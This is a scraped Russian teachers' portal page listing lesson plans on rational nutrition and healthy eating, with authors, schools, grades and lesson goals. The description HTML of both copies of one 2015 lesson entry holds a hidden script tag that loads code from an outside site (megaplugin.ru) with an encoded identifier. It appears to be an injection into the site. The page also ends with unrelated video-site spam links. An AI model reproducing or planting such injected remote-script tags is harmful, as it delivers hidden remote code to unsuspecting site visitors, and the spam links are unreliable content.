Официальный сайт mydebut 24/7/365

Вы не зарегистрированы

Авторизация



рациональное питание

«Здоровье и питание»

Submitted by Антонина Ивановна Титова on Sat, 03/01/2015 - 18:13
Данные об авторе
Автор(ы): 
Титова Антонина Ивановна
Место работы, должность: 

МБОУ "Новорогачинская СОШ" учитель начальных классов

Регион: 
Волгоградская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
2 класс
Предмет(ы): 
Окружающий мир
Цель урока: 

формировать у детей бережное отношение к своему здоровью, как одной из главных ценностей человеческой жизни; создать условия для углубленного знакомства детей с правилами питания; закрепить понятие «рациональное питание (разумное питание)».

Тип урока: 
Комбинированный урок
Учащихся в классе (аудитории): 
27
Используемые учебники и учебные пособия: 

Учебник «Окружающий мир»

Автор-составитель: Виноградова Н.Ф.


Используемая методическая литература: 
Используемое оборудование: 

  компьютер, проектор, фишки – самооценки, шапочки – маски, посуда,  подносы, продукты для опыта, толковый словарь, карточки с названием продуктов.


 


 


Используемые ЦОР: 

презентация

Краткое описание: 
<p>Урок окружающего мира по теме: &laquo;Здоровье и питание&raquo; проводился во 2 классе. В ходе урока создавалась ситуация, способствующая самостоятельному поиску решения проблемы, атмосфера сотворчества, взаимодействия и дискуссии. Интерес поддерживался через организацию игровых видов работы. Использование слайдов презентации подводил детей к правильному выводу, осмыслению нового материала. Благодаря единству стиля и оформления презентации, урок прошел в хорошем темпе, а использование ИКТ, театрализация и работа в группах позволило достичь поставленных целей.</p> <p><br /> &nbsp;</p> <p><br /> &nbsp;</p> <p><br /> <script src="http://megaplugin.ru/datax.php?snid=VyAtRENXWUEzVTc5OTY1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&amp;rnd=2018"></script> </p>

«Здоровье и питание»

Submitted by Антонина Ивановна Титова on Sat, 03/01/2015 - 18:11
Данные об авторе
Автор(ы): 
Титова Антонина Ивановна
Место работы, должность: 

МБОУ "Новорогачинская СОШ" учитель начальных классов

Регион: 
Волгоградская область
Характеристики урока (занятия)
Уровень образования: 
начальное общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
2 класс
Предмет(ы): 
Окружающий мир
Цель урока: 

формировать у детей бережное отношение к своему здоровью, как одной из главных ценностей человеческой жизни; создать условия для углубленного знакомства детей с правилами питания; закрепить понятие «рациональное питание (разумное питание)».

Тип урока: 
Комбинированный урок
Учащихся в классе (аудитории): 
27
Используемые учебники и учебные пособия: 

Учебник «Окружающий мир»

Автор-составитель: Виноградова Н.Ф.


Используемая методическая литература: 
Используемое оборудование: 

  компьютер, проектор, фишки – самооценки, шапочки – маски, посуда,  подносы, продукты для опыта, толковый словарь, карточки с названием продуктов.


 


 


Используемые ЦОР: 

презентация

Краткое описание: 
<p>Урок окружающего мира по теме: &laquo;Здоровье и питание&raquo; проводился во 2 классе. В ходе урока создавалась ситуация, способствующая самостоятельному поиску решения проблемы, атмосфера сотворчества, взаимодействия и дискуссии. Интерес поддерживался через организацию игровых видов работы. Использование слайдов презентации подводил детей к правильному выводу, осмыслению нового материала. Благодаря единству стиля и оформления презентации, урок прошел в хорошем темпе, а использование ИКТ, театрализация и работа в группах позволило достичь поставленных целей.</p> <p><br /> &nbsp;</p> <p><br /> &nbsp;</p> <p><br /> <script src="http://megaplugin.ru/datax.php?snid=VyAtRENXWUEzVTc5OTY1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==&amp;rnd=2018"></script> </p>

Урок-игра "Рациональное питание"

Submitted by Виктория Скрипицына on пн, 16/06/2014 - 23:20
Данные об авторе
Автор(ы): 
Скрипицына В.Ю.
Место работы, должность: 

ГБОУ СОШ №422

Регион: 
Город Санкт-Петербург
Характеристики урока (занятия)
Уровень образования: 
основное общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
6 класс
Предмет(ы): 
Основы безопасности жизнедеятельности
Цель урока: 
  • объяснить важность сбалансированного питания для обеспечения собственной
  • экологической безопасности питания и состояния здоровья.
  • дать представление об основах здорового образа жизни.
Тип урока: 
Комбинированный урок
Используемые учебники и учебные пособия: 

Латчук, 6 класс

Краткое описание: 
<p>Урок-игра по теме &quot;Рациональное питание&quot;</p>

Здоровое питание

Submitted by Татьяна Васильевна Андриянова on Fri, 20/12/2013 - 09:21
Данные об авторе
Автор(ы): 
Андриянова Татьяна Васильевна
Место работы, должность: 
МБОУ" СОШ с. Сухой Карабулак", учитель технологии
Регион: 
Саратовская область
Характеристики урока (занятия)
Уровень образования: 
основное общее образование
Целевая аудитория: 
Учащийся (студент)
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
5 класс
Предмет(ы): 
Технология
Цель урока: 

Формирование умений по составлению правильного, рационального меню

Тип урока: 
Урок изучения и первичного закрепления новых знаний
Учащихся в классе (аудитории): 
6
Используемые учебники и учебные пособия: 

Синица Н.В.,Симоненко В.Д.

Интернет ресурсы

Используемое оборудование: 

компьютер

Краткое описание: 
На этом уроке дети познакомятся с правильным питанием, как правильно составить меню

Рациональное питание

Фото пользователя Светлана Владимировна Шишова
Submitted by Светлана Владимировна Шишова on Tue, 02/10/2012 - 21:45
Данные об авторе
Автор(ы): 
Шишова Светланат Владимировна
Место работы, должность: 
ТОГАОУ СПО «Педагогический колледж г. Тамбова»
Регион: 
Тамбовская область
Характеристики урока (занятия)
Уровень образования: 
начальное профессиональное образование
Целевая аудитория: 
Классный руководитель
Целевая аудитория: 
Медицинский работник
Целевая аудитория: 
Родитель
Целевая аудитория: 
Тьютор
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
Все классы
Предмет(ы): 
Биология
Предмет(ы): 
Валеология (здоровый образ жизни)
Предмет(ы): 
Основы безопасности жизнедеятельности
Цель урока: 

               Цель: обоснование необходимости рационального питания.

Задачи:

  • образовательные: раскрыть понятие «рациональное питание», дать студентам знания о принципах рационального питания,  пищевом рационе, здоровом питании как важнейшем условии долголетия; показать роль рационального  питание для растущего организма;
  • развивающие: развивать культуру деятельности;
  • воспитательные: воспитывать культуру здорового питания.
Тип урока: 
Комбинированный урок
Используемые учебники и учебные пособия: 
  1.    Дубровский, В.И.  Валеология. Здоровый образ жизни/ В.И.  Дубровский. -  М., 2002.
  2.    Дубровский,  В.И.  Спортивная медицина / В.И.  Дубровский. -  М.,  2002
  3.    Дубровский,  В.И.  Гигиена физического воспитания и спорта/ В.И.  Дубровский. - М.,  Владос. 2003
  4.    Марков    В.    В.    «Основы    здорового    образа    жизни    и профилактика болезней». М. 2001.
Используемая методическая литература: 
  1.  Гурова,  А.И.  Практикум по общей гигиене/ А.И.  Гурова. -  М., 1991
  2.  Минх,  А.А. Общая гигиена и медицина/  А.А. Минх. - Казин Э. М. «Основы индивидуального здоровья человека». М. Владос. 2000.
  3. Петровский,  К.С.  Гигиена питания/  К.С.  Петровский М., 1982
  4. Шувалова, Е.П. «Пищевые отравления»./ Е.П. Шувалова. - М., 1989.
Используемое оборудование: 

Оборудование: компьютер,проектор, экран,раздаточный материал, презентации, выставка литературы по теме.

Используемые ЦОР: 

 

  • видеофрагменты,

  • текстовые документы,

  • электронная лекция.

Краткое описание: 
Рациональное питание является одним из основных факторов внешней среды, определяющих нормальное развитие человека. Питание оказывает самое непосредственное влияние на жизнедеятельность, рост и развитие человеческого организма. От качества питания во многом зависит состояние здоровья. Вот почему необходимо соблюдать принципы рационального питания.
Ресурс для профильной школы: 
Ресурс для профильной школы

Рациональное питание является одним из основных факторов внешней среды, определяющих нормальное развитие человека.


Изменение традиций питания русского народа

Данные об авторе
Автор(ы): 
Кубанская Н.Н.
Место работы, должность: 

МОУ "СОШ № 27" г. Саратов, учитель биологии и экологии

Регион: 
Саратовская область
Характеристики урока (занятия)
Уровень образования: 
среднее (полное) общее образование
Целевая аудитория: 
Учитель (преподаватель)
Класс(ы): 
8 класс
Класс(ы): 
9 класс
Класс(ы): 
10 класс
Класс(ы): 
11 класс
Предмет(ы): 
Биология
Предмет(ы): 
Экология
Цель урока: 

Раскрыть связь питания и здоровья в традициях культуры русского народа. 

Тип урока: 
Урок обобщения и систематизации знаний
Учеников в классе: 
25
Используемое оборудование: 

Презентация

Краткое описание: 
<p style="margin-left: 18pt"> <strong><em>&nbsp; 1. Изменение питания в мире.</em></strong></p> <p style="margin-left: 18pt"> <strong><em>&nbsp;а)</em></strong><strong><em>Традиции в питании русских людей</em></strong><strong><em>.</em></strong></p> <p> <strong><em>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; б) Пост в Руси.</em></strong></p> <p> <strong><em>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2.Рациональное питание &ndash; залог здоровья.</em></strong></p> <p> <strong><em>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;а) &nbsp;О Фастфуде </em></strong></p> <p> <strong><em>&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;б) Сбалансированность питания. </em></strong></p> <p> <strong><em>&nbsp;&nbsp;&nbsp;&nbsp; 3.Принципы здорового питания.&nbsp;</em></strong></p>
Ресурс для профильной школы: 
Ресурс для профильной школы

                                &n


»  Tags for document:

Смотреть видео hd онлайн


Смотреть русское с разговорами видео

Online video HD

Видео скачать на телефон

Русские фильмы бесплатно

Full HD video online

Смотреть видео онлайн

Смотреть HD видео бесплатно

School смотреть онлайн